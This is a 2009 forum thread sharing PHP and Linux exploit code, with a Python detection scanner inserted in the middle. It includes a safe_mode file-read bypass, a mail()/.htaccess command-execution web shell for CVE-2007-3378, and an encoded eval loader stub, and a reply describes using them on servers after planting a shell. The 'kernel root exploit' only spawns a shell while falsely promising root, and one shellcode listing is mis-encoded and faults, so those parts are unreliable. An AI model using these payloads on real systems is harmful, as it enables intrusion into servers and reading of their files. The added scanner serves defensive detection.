mywisdom Visitor
Number of posts: 19 Join date: 24.05.09
Subject: Assorted Exploits and Bypasses Sat Jun 20, 2009 1:20 am
Safe mode bypass, PHP 4.4.2-5.2.1 (load file) - Code:
<?php
/*
 Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
 by Maksymilian Arciemowicz
 SecurityReason.Com
 cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
 greetings sp3x
*/
$file="";    // File to include... or use _GET / _POST
$tymczas=""; // Set $tymczas to a dir where you have 777, like /var/tmp

echo "<PRE>\n";
if(empty($file)){
  if(empty($_GET['file'])){
    if(empty($_POST['file'])){
      die("\nSet the variables \$tymczas and \$file, or pass the variable file via POST or GET, like ?file=/etc/passwd\n <B><CENTER><FONT COLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>");
    } else {
      $file=$_POST['file'];
    }
  } else {
    $file=$_GET['file'];
  }
}

// The read goes through the compress.zlib:// stream wrapper: in the affected versions
// that wrapper did not apply the safe_mode/open_basedir checks a plain open() would.
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
  $zrodlo = fopen($temp, "r");
  $tekst = fread($zrodlo, filesize($temp));
  fclose($zrodlo);
  echo "<B>--- Start File ".htmlspecialchars($file)." -------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File ".htmlspecialchars($file)." ---------------\n";
  unlink($temp);
  die("\n<FONT COLOR=\"RED\"><B>File ".htmlspecialchars($file)." has been loaded. SecurityReason Team ;]</B></FONT>");
} else {
  die("<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> doesn't exist or you don't have access.</CENTER></FONT>");
}
?>
Shell command & disable_functions bypass (PHP 5.2.3): - Code:
<?php
# SecurityReason
# Coded by Maksymilian Arciemowicz
# (C) Copyright SecurityReason
#
# Advisory : http://securityreason.com/achievement_securityalert/45
# Original Exploit : http://securityreason.com/achievement_exploitalert/9
#
# SecurityAlert : 45
# CVE : CVE-2007-3378
# SecurityRisk : High
# Remote Exploit : No
# Local Exploit : Yes
# Affected Software : PHP 5.2.3 and prior
#
# This exploit bypasses safe_mode, open_basedir and disable_functions.
# First it creates a crafted .htaccess file; then every submitted command is executed
# through the mail() function and its output is written to result.txt.
# Usage :
# ?cxib=dhr - Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#

#variables
$htaccess="./.htaccess";
#variables

if(@mail("", "", "")==FALSE){ die("mail() function isn't active."); }
if(!is_writable("./")){ die("This directory isn't writable."); }
if($_GET['cxib']=="dhr"){ @unlink("./.htaccess"); @unlink("./result.txt"); }

$usun="";
if(file_exists("./result.txt") AND file_exists("./.htaccess")){
  $usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>";
}
$htmlstart="<HTML> <HEAD> <TITLE>SecurityReason Exploit - PHP 5.2.3 and prior</TITLE> </HEAD> <BODY>";
$formtxt="<center><h1>Security<b><font color=RED>R</font>eason</b></h1><p>Exploit for PHP 5.2.3 and prior</p><B><CENTER><FONT COLOR=\"RED\">C</FONT>oded by <b>Maksymilian Arciemowicz</b>
".$usun." <p>Form:<br>
<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\" name=\"Form\" method=\"POST\"> sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\"> <input type=\"submit\" name=\"sent\" value=\"Exec\"> </form> </CENTER></B>";
$htmlend="</BODY> </HTML>";
$path=dirname($_SERVER["SCRIPT_NAME"]);

if(empty($sh)){
  if(empty($_GET['sh'])){
    if(empty($_POST['sh'])){
      echo $htmlstart.$formtxt;
      if(file_exists("./result.txt")){
        echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"].$path."/result.txt\" height=300 width=1000></center>";
      }
      echo $htmlend;
      exit();
    } else {
      $sh=$_POST['sh'];
    }
  } else {
    $sh=$_GET['sh'];
  }
}

// The .htaccess sets mail.force_extra_parameters, which mail() appends to the
// sendmail command line; that is the weakness tracked as CVE-2007-3378 above.
if (!$handle = @fopen($htaccess, 'w')) {
  echo "Cannot create ".$htaccess.". Check your rights to this directory.";
  exit;
}
$syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";
if (fwrite($handle, $syntax) === FALSE) { echo "Cannot write to file (".$htaccess.")"; exit; }

if(!empty($_POST['sent'])){
  @mail("", "", "Yeah");
  sleep(2);
  header("Location: http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
  exit();
}
?>
php 5.2.9: - Code:
<? eval(gzinflate(base64_decode('...'))); ?>
Root Exploit, kernel 2.6.17 - Code:
<?php
/******************************
 Script Name : *nix Kernel <=2.6.17 Sudo Root Exploit
 Author : Affix
 Website : http://iHack.co.uk
 Description : Once this script has been run via the command line, type `sudo su`
               and you will log in as root without the root password
 ******************************/

// Single-quoted so the \x escapes reach the C source as written (in a double-quoted
// PHP string PHP would expand them to raw bytes before the file is written).
// What follows is the textbook execve("/bin//sh") stub: compiled into an ordinary,
// non-setuid binary it only spawns a shell with the caller's own privileges, so
// nothing in this script touches the kernel or changes who you are.
$cCode = '#include <stdio.h>
char shellcode[] =
  "\x31\xc0"              /* xor %eax, %eax */
  "\x50"                  /* push %eax */
  "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f */
  "\x89\xe3"              /* mov %esp,%ebx */
  "\x50"                  /* push %eax */
  "\x53"                  /* push %ebx */
  "\x89\xe1"              /* mov %esp,%ecx */
  "\x31\xd2"              /* xor %edx,%edx */
  "\xb0\x0b"              /* mov $0xb,%al */
  "\xcd\x80";             /* int $0x80 */
int main() { void (*fp) (void); fp = (void *)shellcode; fp(); }';

print "$ 0day Kernel 2.6.17 Local Root by krupt\n";
print "$ PoC krupt <iamkrupt@gmail.com>\n";
print "$ Exploit : Affix <affix@iHack.co.uk>\n";
print "$...\n";
print "$ Please wait, the exploit is being executed...\n";

$fh = fopen("/tmp/sploit.c", 'w') or die("can't open file");
fwrite($fh, $cCode);
fclose($fh);

// The original issued cd, cc and chmod as three separate system() calls, so the cd
// never applied to the compile; chained here so they run in the same directory.
system("cd /tmp && cc -o sploit sploit.c && chmod 777 sploit.c");
print "$ You may now login as root with no password.\n";
print "$ Execute 'sudo su' command\n";
print "$ Root Shell spawning\n";
system("/tmp/sploit");
?>
Setuid Shellcode (trial version for kernel 2.4.x) - Code:
/* drunken sh33lc0de by mywisdom */
#include <stdio.h>
#include <stdlib.h>

int main() {
    /* Note: the listing is written as "/0x55/0x89/..." rather than as C byte
       escapes, so this array holds the ASCII text of those tokens, not the
       machine code they name; the cast-and-call below therefore jumps into
       printable text and faults. */
    char drunk[] =
        "/0x55/0x89/0xe5/0x83/0xec/0x28/0x83/0xec/0x08/0xff/0x75/0x08"
        "/0x8d/0x45/0xec/0x50/0xe8/0x2f/0xff/0xff/0xff/0x83/0xc4/0x10"
        "/0xc9/0xc3/0x8d/0x4c/0x24/0x04/0x83/0xe4/0xf0/0xff/0x71/0xfc"
        "/0x55/0x89/0xe5/0x51/0x81/0xec/0x94/0x00/0x00/0x00/0xc7/0x45"
        "/0xf8/0x00/0x00/0x00/0x00/0xeb/0x0e/0x8b/0x45/0xf8/0xc6/0x84"
        "/0x05/0x78/0xff/0xff/0xff/0x41/0xff/0x45/0xf8/0x83/0x7d/0xf8"
        "/0x7f/0x7e/0xec/0x83/0xec/0x0c/0x8d/0x85/0x78/0xff/0xff/0xff"
        "/0x50/0xe8/0xa6/0xff/0xff/0xff/0x83/0xc4/0x10/0x83/0xec/0x0c"
        "/0x6a/0x00/0xe8/0xcd/0xfe/0xff/0xff/0x83/0xc4/0x10/0x83/0xec"
        "/0x0c/0x68/0x28/0x85/0x04/0x08/0xe8/0x9d/0xfe/0xff/0xff/0x83"
        "/0xc4/0x10/0xb8/0x00/0x00/0x00/0x00/0x8b/0x4d/0xfc/0xc9/0x8d"
        "/0x61/0xfc/0xc3/0x90/0x90/0x90/0x90/0x90";
    (*(void (*)()) drunk)();
}
Sample BOF followed by setuid: - Code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void overflow_function (char *str) {
    char buffer[20];
    strcpy(buffer, str); // copies str into buffer with no length check: 128+ bytes into 20
}

int main() {
    char big_string[128];
    int i;
    for(i=0; i < 128; i++) { // loop 128 times
        big_string[i] = 'A';  // and fill big_string with 'A's (never NUL-terminated)
    }
    overflow_function(big_string); // overruns the 20-byte stack buffer and the saved return address
    setuid( 0 );                   // only succeeds if the process already runs as root (e.g. a setuid-root binary)
    system( "/bin/bash" );
    return 0;
    // Unreachable after the return above; kept from the original post.
    seteuid(0);
    execve("./setuid",0,0);
    return 0;
}
Last edited by mywisdom on Sat Jun 20, 2009 1:56 am, edited 1 time in total
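Detection logic for the traces the PHP exploits in this post leave on a webroot (an .htaccess setting mail.force_extra_parameters, an eval(gzinflate(base64_decode())) loader, reads through compress.zlib://), written as an added example from the defender's side and not taken from the thread; the file paths, contents and severity labels are constructed samples.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample webroot, modelled on what the PHP posts above leave on disk:
# an .htaccess that turns mail() into a command runner, an eval() loader around an
# encoded payload, and two benign files that must not be flagged.
SAMPLE_FILES: Dict[str, str] = {
    "/var/www/html/up/.htaccess":
        "php_value mail.force_extra_parameters '-t && id > /var/www/html/up/result.txt'\n",
    "/var/www/html/up/x.php":
        "<? eval(gzinflate(base64_decode('H4sIAAAAAAAA...constructed-placeholder...'))); ?>\n",
    "/var/www/html/index.php":
        "<?php echo 'hello'; ?>\n",
    "/var/www/html/.htaccess":
        "php_value upload_max_filesize 8M\n",
}

# (rule name, severity, pattern); severities are this example's own labels.
RULES = [
    ("htaccess-mail-force-extra-parameters", "high",
     re.compile(r"php_(value|flag)\s+mail\.force_extra_parameters\b", re.I)),
    ("php-eval-encoded-loader", "high",
     re.compile(r"\beval\s*\(\s*(gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(", re.I)),
    ("php-compress-zlib-wrapper", "review",  # legitimate uses exist; triage by hand
     re.compile(r"compress\.zlib://", re.I)),
]

def scan_text(path: str, text: str) -> List[Tuple[str, int, str, str]]:
    """Return (path, line_no, rule, severity) for every rule hit in one file."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        for name, severity, rx in RULES:
            if rx.search(line):
                hits.append((path, no, name, severity))
    return hits

def scan_files(files: Dict[str, str]) -> List[Tuple[str, int, str, str]]:
    """Scan an in-memory {path: contents} map; swap in os.walk + open() for a real webroot."""
    hits = []
    for path, text in files.items():
        hits.extend(scan_text(path, text))
    return hits

if __name__ == "__main__":
    for path, no, rule, severity in scan_files(SAMPLE_FILES):
        print(f"[{severity}] {path}:{no} {rule}")
```

A hit on the first rule is also worth pairing with a look for a fresh result.txt next to the .htaccess, which is the output file the posted script writes.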
vhesckot Visitor
Number of posts: 56 Join date: 03.06.09
Subject: Re: Assorted Exploits and Bypasses Sat Jun 20, 2009 1:42 am
gunslinger_ Lab Assistant
Number of posts: 184 Join date: 15.05.09 Age: 30 Location: mars
Subject: Re: Assorted Exploits and Bypasses Sat Jun 20, 2009 4:35 am
N4ck0 Visitor
Number of posts: 59 Join date: 21.06.09
Subject: Re: Assorted Exploits and Bypasses Sun Jun 21, 2009 9:21 am
First of all, my apologies to the masters here. I just want to ask: what is a bypass actually for?
mywisdom Visitor
Number of posts: 19 Join date: 24.05.09
Subject: Re: Assorted Exploits and Bypasses Sun Jun 21, 2009 11:08 am
Say you plant a shell, bro, and safe mode is on: with this bypass you can load files and run shell commands.
N4ck0 Visitor
Number of posts: 59 Join date: 21.06.09
Subject: Re: Assorted Exploits and Bypasses Mon Jun 22, 2009 12:17 am
Oh, I see. Okay, that's something new I learned.
Thanks!
gunslinger_ Lab Assistant
Number of posts: 184 Join date: 15.05.09 Age: 30 Location: mars
Subject: Re: Assorted Exploits and Bypasses Mon Jun 22, 2009 8:11 am